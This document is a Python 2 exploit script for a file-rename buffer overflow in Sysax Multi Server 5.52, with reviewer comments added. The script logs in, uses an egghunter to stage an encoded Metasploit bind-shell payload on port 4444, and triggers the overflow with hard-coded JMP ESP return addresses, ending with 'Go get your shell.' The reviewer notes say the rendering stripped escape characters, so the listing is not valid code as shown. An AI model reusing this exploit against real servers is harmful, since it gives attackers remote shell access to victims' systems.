
Sysax Multi Server 5.52 Buffer Overflow

Posted on 11 February 2012

#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP)
#Software Versions Tested: 5.50 and 5.52
#Date Discovered: Febrary 1, 2012
#Vendor Contacted: Febrary 3, 2012
#Vendor Response: (none)
#A complete description of this exploit can be found here:
#http://www.pwnag3.com/2012/02/sysax-multi-server-552-file-rename.html
##########################################################################################################
#
# Reviewer notes (added on review, code left as rendered):
# - Python 2 script (print statements, base64.encodestring); it does not run under Python 3.
# - Every string literal below is reproduced exactly as it appears on the source page. The page
#   rendering appears to have dropped backslashes and CRLF header terminators, so the byte
#   strings, the path regex and the quoted multipart field names are not what the author wrote
#   and the listing is not syntactically valid as shown. Nothing has been reconstructed here.
# - Flow as written: POST credentials to pid=dologin, pull a 40-character sid out of the reply,
#   locate the user's home path (uploading a file if the listing is empty) to size the overflow,
#   send the payload string inside the pid= query value of a mk_folder2 request, then send an
#   oversized `e2` multipart field to rnmslctd1_name1.htm, which is the overflow itself.
# - Defender's view: the only anomalous traffic is an unusually long pid= query value and an
#   oversized `e2` field in the rename POST, both on the server's listening port; request
#   logging or input-length limits on those two fields are where this would be observed.

import socket,sys,time,re,base64

# Exactly five positional arguments are required (argv[0] is the script name).
if len(sys.argv) != 6:
    print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <XP or 2K3>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
password = sys.argv[4]
opersys = sys.argv[5]  # only "2K3" and "XP" are handled below; any other value leaves `buf` unbound

#base64 encode the provided creds
# NOTE(review): encodestring appends a trailing newline, yet the login request below hard-codes
# Content-Length: 15 regardless of the encoded length.
creds = base64.encodestring(user+"x0a"+password)

#msfpayload windows/shell_bind_tcp LPORT=4444 R|msfencode -e x86/alpha_mixed -b "x00x2fx0a"
# The leading "DNWPDNWP" is the 8-byte marker the egghunter below looks for (its tag bytes
# 44 4e 57 50 spell "DNWP"); the remainder is the encoded payload as rendered on the page.
shell = ("DNWPDNWP"
"x89xe3xdaxc5xd9x73xf4x5ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59"
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41"
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4ax49x39x6cx58x68x6dx59x55x50x65x50x45"
"x50x55x30x4ex69x39x75x55x61x39x42x61x74x4c"
"x4bx51x42x50x30x6ex6bx73x62x36x6cx6ex6bx63"
"x62x57x64x6cx4bx53x42x55x78x66x6fx6dx67x73"
"x7ax37x56x45x61x4bx4fx45x61x6fx30x4cx6cx65"
"x6cx61x71x33x4cx75x52x64x6cx45x70x79x51x38"
"x4fx66x6dx63x31x58x47x7ax42x68x70x73x62x71"
"x47x6cx4bx33x62x32x30x4cx4bx77x32x55x6cx36"
"x61x58x50x6ex6bx71x50x62x58x6ex65x4bx70x33"
"x44x61x5ax77x71x68x50x72x70x4cx4bx33x78x36"
"x78x6ex6bx70x58x71x30x57x71x59x43x79x73x75"
"x6cx43x79x6ex6bx34x74x6cx4bx47x71x6ex36x55"
"x61x49x6fx56x51x6fx30x4cx6cx49x51x68x4fx34"
"x4dx33x31x49x57x64x78x69x70x30x75x38x74x75"
"x53x53x4dx6bx48x37x4bx71x6dx51x34x52x55x6a"
"x42x33x68x4ex6bx42x78x75x74x43x31x6ex33x62"
"x46x6ex6bx66x6cx32x6bx4ex6bx76x38x47x6cx77"
"x71x68x53x4ex6bx65x54x4cx4bx57x71x78x50x4f"
"x79x67x34x51x34x51x34x63x6bx61x4bx65x31x30"
"x59x30x5ax53x61x39x6fx6dx30x33x68x31x4fx52"
"x7ax6cx4bx65x42x68x6bx4cx46x63x6dx55x38x44"
"x73x46x52x63x30x33x30x35x38x42x57x30x73x50"
"x32x73x6fx50x54x31x78x52x6cx34x37x44x66x44"
"x47x59x6fx6ex35x6ex58x6ex70x77x71x55x50x55"
"x50x46x49x49x54x46x34x42x70x61x78x51x39x6f"
"x70x50x6bx53x30x59x6fx49x45x50x50x50x50x36"
"x30x72x70x51x50x32x70x57x30x72x70x43x58x38"
"x6ax34x4fx79x4fx6bx50x79x6fx39x45x6dx59x79"
"x57x50x31x49x4bx51x43x65x38x43x32x45x50x72"
"x31x73x6cx6cx49x49x76x32x4ax34x50x76x36x72"
"x77x45x38x5ax62x4bx6bx55x67x63x57x79x6fx38"
"x55x71x43x51x47x43x58x4fx47x59x79x64x78x69"
"x6fx59x6fx7ax75x36x33x70x53x51x47x65x38x61"
"x64x78x6cx67x4bx69x71x49x6fx48x55x70x57x6f"
"x79x49x57x63x58x42x55x50x6ex72x6dx55x31x79"
"x6fx39x45x33x58x63x53x72x4dx35x34x77x70x4e"
"x69x79x73x76x37x73x67x62x77x46x51x7ax56x31"
"x7ax57x62x76x39x46x36x4bx52x39x6dx42x46x38"
"x47x62x64x61x34x47x4cx45x51x57x71x4cx4dx47"
"x34x76x44x44x50x79x56x63x30x53x74x33x64x70"
"x50x53x66x42x76x52x76x53x76x76x36x30x4ex71"
"x46x32x76x36x33x62x76x53x58x44x39x48x4cx57"
"x4fx6ex66x69x6fx79x45x6fx79x6dx30x30x4ex32"
"x76x63x76x49x6fx56x50x42x48x65x58x6dx57x45"
"x4dx31x70x79x6fx38x55x4dx6bx78x70x4dx65x69"
"x32x30x56x50x68x4fx56x4ax35x4dx6dx6fx6dx49"
"x6fx39x45x55x6cx66x66x43x4cx56x6ax4dx50x69"
"x6bx59x70x64x35x74x45x6fx4bx53x77x55x43x43"
"x42x42x4fx43x5ax55x50x52x73x79x6fx68x55x41"
"x41")

# Egghunter stub as rendered on the page (escapes stripped, see header note).
egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x44x4ex57x50x8bxfaxafx75xeaxafx75xe7xffxe7")

print "============================================================================"
print " Sysax Multi Server <= 5.52 File Rename BoF "
print " by cd1zz "
print " www.pwnag3.com "
print " Launching exploit against " + target + " on port " + str(port) + " for " + opersys
print "============================================================================"

#login with encoded creds
# Hand-built HTTP/1.1 request; the body is the single form field fd=<base64 creds>.
login = "POST /scgi?sid=0&pid=dologin HTTP/1.1 "
login += "Host: "
login += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 "
login += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
login += "Accept-Language: en-us,en;q=0.5 "
login += "Accept-Encoding: gzip, deflate "
login += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 "
login += "Proxy-Connection: keep-alive "
login += "http://"+target+"/scgi?sid=0&pid=dologin "
login += "Content-Type: application/x-www-form-urlencoded "
login += "Content-Length: 15 "
login += "fd="+creds

#grab the sid
# One recv() of up to 10240 bytes is assumed to contain the whole login response.
r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
r.connect((target, port))
print "[*] Getting your SID."
r.send(login + " ")
page = r.recv(10240)
# The session id is expected as a 40-character alphanumeric sid= parameter in the reply.
sid = re.search(r'sid=[a-zA-Z0-9]{40}',page,re.M)
if sid is None:
    print "[X] Could not get a SID. User and pass correct?"
    sys.exit(1)
print "[+] Your " + sid.group(0)
time.sleep(2)

#find the users path to calc offset
# The offset below depends on the length of the user's home path, which is scraped from a
# file= link in the same login response. (Regex reproduced as rendered; see header note.)
print "[*] Finding home path to calculate offset."
path = re.search(r'file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]',page,re.M)
time.sleep(1)

#if that doesnt work, try to upload a file and check again
if path is None:
    print "[-] There are no files in your path so I'm going to try to upload one for you."
    print "[-] If you don't have rights to do this, it will fail."
    # Multipart upload of an empty file.txt so that a file= link appears in the listing.
    # NOTE(review): Content-Length is hard-coded (219) rather than computed from the body.
    upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1 "
    upload += "Host: "
    upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620 "
    upload += "Content-Length: 219 "
    upload += "-----------------------------97336096252362005297691620 "
    upload += "Content-Disposition: form-data; name="upload_file"; filename="file.txt" "
    upload += "Content-Type: text/plain "
    upload += "-----------------------------97336096252362005297691620-- "
    u = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    u.connect((target, port))
    u.send(upload + " ")
    page = u.recv(10240)
    path = re.search(r'file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]',page,re.M)
    time.sleep(2)
    # Socket `u` is never closed.
    if path is None:
        print "[X] It failed, you probably don't have rights to upload."
        print "[X] You will need to get your path another way to properly calculate the offset."
        sys.exit(1)

print "[+] Got it ==> " + path.group(0)
time.sleep(1)

#subtract --> file=c: <--- (8 bytes) from the length and minus one more for the trailing -->
pathlength = len(path.group(0)) - 8 - 1
#print "[*] The path is " + str(pathlength) + " bytes long (not including C:)."

# Author's guard: with a short path the request still overflows but cannot redirect execution.
if pathlength < 16:
    print "[X] Your path is too short, this will just DoS the server."
    print "[X] The path has to be at least 16 bytes long or we cant jump to our buffer."
    sys.exit(1)

time.sleep(2)
r.close()

#jump back 128 bytes
jumpback = "xebx80"

#No DEP bypass
# Return addresses are hard-coded per OS build, as stated in the header ("No DEP"). There is
# no else-branch: an unrecognised opersys value leaves `buf` undefined and stage2 below raises
# NameError. Both branches use the same 2044 base despite the differing comments.
if opersys == "2K3":
    #2043 is the offset for c:A
    offset = 2044 - pathlength
    padding = "x90" * 10
    junk = "x41" * (offset - len(egghunter+padding))
    jump = "xa4xdex8ex7c" #JMP ESP
    buf = junk + egghunter + padding + jump + "x90"*12 + jumpback + "D"*10

if opersys == "XP":
    #2044 is the offset for c:A
    offset = 2044 - pathlength
    padding = "x90" * 10
    junk = "x41" * (offset - len(egghunter+padding))
    jump = "x53x93x42x7e" #JMP ESP
    buf = junk + egghunter + padding + jump + "x90"*12 + jumpback + "D"*10

#print "[*] Your offset is " + str(offset)

#we'll stuff our shell in memory first
# Stage 1 carries `shell` inside the pid= query value of a mk_folder request so it is resident
# when the egghunter runs. Content-Length is again a fixed literal (171).
stage1 = "POST /scgi?"+str(sid.group(0))+"&pid="+shell+"mk_folder2_name1.htm HTTP/1.1 "
stage1 += "Host: "
stage1 += "Referer: http://"+target+"/scgi?sid="+str(sid.group(0))+"&pid=mk_folder1_name1.htm "
stage1 += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231 "
stage1 += "Content-Length: 171 "
stage1 += "-----------------------------1190753071675116720811342231 "
stage1 += "Content-Disposition: form-data; name="e2" "
stage1 += "file_test "
stage1 += "-----------------------------1190753071675116720811342231-- "

#this is the bof
# Stage 2 is the rename request; the overflow is the oversized `e2` field ("file_" + buf).
# NOTE(review): the header is spelled "Referrer" here but "Referer" in stage1; Content-Length
# (183) is a fixed literal and does not reflect the actual body size.
stage2 = "POST /scgi?"+str(sid.group(0))+"&pid=rnmslctd1_name1.htm HTTP/1.1 "
stage2 += "Host: "
stage2 += "Referrer: http://"+target+"/scgi?sid=0&pid=dologin "
stage2 += "Content-Type: multipart/form-data; boundary=---------------------------332173112583677792048824791 "
stage2 += "Content-Length: 183 "
stage2 += "-----------------------------332173112583677792048824791 "
stage2 += "Content-Disposition: form-data; name="e2" "
stage2 += "file_"+buf+" "
stage2 += "-----------------------------332173112583677792048824791-- "

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target, port))
print "[*] Sending stage 1 shell."
s.send(stage1 + " ")
time.sleep(3)
##Dont close the socket or we'll lose our stage 1 shell in memory
##s.close()

# Second connection for the overflow; the first (`s`) is intentionally left open (see above).
t = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
t.connect((target, port))
print "[*] Sending stage 2 BoF."
t.send(stage2 + " ")
print "[*] Go get your shell..."
# Response is read and discarded; no success/failure check is performed.
t.recv(2048)

 
